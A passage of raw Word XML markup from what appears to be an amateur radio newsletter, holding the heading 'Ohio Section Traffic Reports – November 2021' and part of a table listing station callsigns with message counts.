              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="710D6533" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29F04AB8" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="026F2B9F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DE91DC4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7327F272" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E8CF520" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60A4B440" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E663731" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0260193D" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6358582E" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427ABE03" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB2B1F4" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE169B2" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB4E2BF" w14:textId="6E61E6D5" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OHIO SECTION TRAFFIC REPORTS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B8BF6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1530"/>
        <w:gridCol w:w="1774"/>
        <w:gridCol w:w="1771"/>
        <w:gridCol w:w="1952"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="51A0C60E" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29E52D4B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>AC8NP-57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58075050" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K8OVO- 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BA10480" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> KD8UOT-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B366A81" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> N8SY-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="591437FB" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FDAF635" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>AC8RV-40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E24110B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KB8HJJ- 45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38AE98E8" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KD8UUB- 38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D2CC1D1" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N8TNV-112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="0897214F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77B475D7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>AD8CM-44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6119BB41" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> KC8HTP-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33319A16" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KL7RF-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10F0FFEF" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>NC8V-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7588FAC6" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
